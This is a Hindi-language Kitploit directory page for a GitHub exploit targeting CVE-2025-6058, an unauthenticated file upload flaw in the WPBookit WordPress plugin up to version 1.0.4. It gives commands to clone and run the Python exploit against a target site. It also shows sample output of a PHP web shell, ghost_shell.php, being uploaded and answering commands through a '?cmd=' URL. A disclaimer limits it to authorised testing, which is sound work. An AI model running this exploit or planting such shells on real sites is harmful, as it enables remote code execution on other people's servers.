Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 अप्रमाणित फ़ाइल अपलोड शोषण | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

WordPress WPBookit ≤ 1.0.4 अप्रमाणित फ़ाइल अपलोड शोषण

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WordPress लोगो

🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 बिना प्रमाणीकरण के फ़ाइल अपलोड शोषण

WordPress WPBookit प्लगइन (≤ 1.0.4) को लक्षित करने वाला बिना प्रमाणीकरण का मनमाना फ़ाइल अपलोड शोषण
यह शोषण रिमोट शेल अपलोड और पूर्ण कमांड निष्पादन की अनुमति देता है।

लेखक: 0xgh057r3c0n


📌 भेद्यता के बारे में

CVE-2025-6058 एक गंभीर भेद्यता है जो WordPress CMS पर WPBookit प्लगइन को प्रभावित करती है। एक बिना प्रमाणीकरण वाला हमलावर एक असुरक्षित AJAX एंडपॉइंट का दुरुपयोग करके मनमानी PHP फ़ाइलें अपलोड कर सकता है, जो रिमोट कोड निष्पादन (RCE) को सक्षम करता है।

  • 🎯 लक्ष्य: WordPress CMS (असुरक्षित WPBookit प्लगइन)
  • 📦 प्रभावित प्लगइन: WPBookit ≤ 1.0.4
  • ⚠️ जोखिम स्तर: गंभीर (बिना प्रमाणीकरण का RCE)

  • ✨ विशेषताएँ

    • 🔍 README.txt के माध्यम से WordPress प्लगइन संस्करण का स्वतः पता लगाता है
    • 📤 हल्का PHP शेल अपलोड करता है (ghost_shell.php)
    • 🖥️ इंटरैक्टिव शेल (Parrot-शैली प्रॉम्प्ट)
    • 🌐 बिना प्रमाणीकरण — लॉगिन की आवश्यकता नहीं
    • 🎨 रंगीन CLI आउटपुट

    🚀 उपयोग गाइड

    💻 आवश्यकताएँ

    root@kitploit:~
    python3 --version
    pip install requests
    

    ⚙️ शोषण निष्पादन

    root@kitploit:~
    git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
    cd CVE-2025-6058
    python3 CVE-2025-6058.py -u https://target-wordpress-site.com
    

    🛠️ उदाहरण शेल सत्र

    root@kitploit:~
    python3 CVE-2025-6058.py -u https://victim.com
    
    [>] Checking plugin version...
    [+] Found plugin version: 1.0.4
    [!] Target version is vulnerable.
    
    [>] Uploading shell...
    [+] Upload successful.
    [+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
    
    [!] Interactive GhostShell Started — type 'exit' to quit.
    
    ┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
    └──╼ $ whoami
    www-data
    

    📂 शेल विवरण

    • फ़ाइल नाम: ghost_shell.php
    • पथ: /wp-content/uploads/YYYY/MM/ghost_shell.php
    • उदाहरण:
    root@kitploit:~
    https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
    

    ⚠️ कानूनी अस्वीकरण

    यह शोषण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए विकसित किया गया है। स्पष्ट सहमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।


    📄 लाइसेंस

    MIT लाइसेंस के तहत जारी


    🛡️ WordPress सुरक्षा ऑडिटिंग के लिए बनाया गया 0xgh057r3c0n द्वारा

    टूल डाउनलोड करें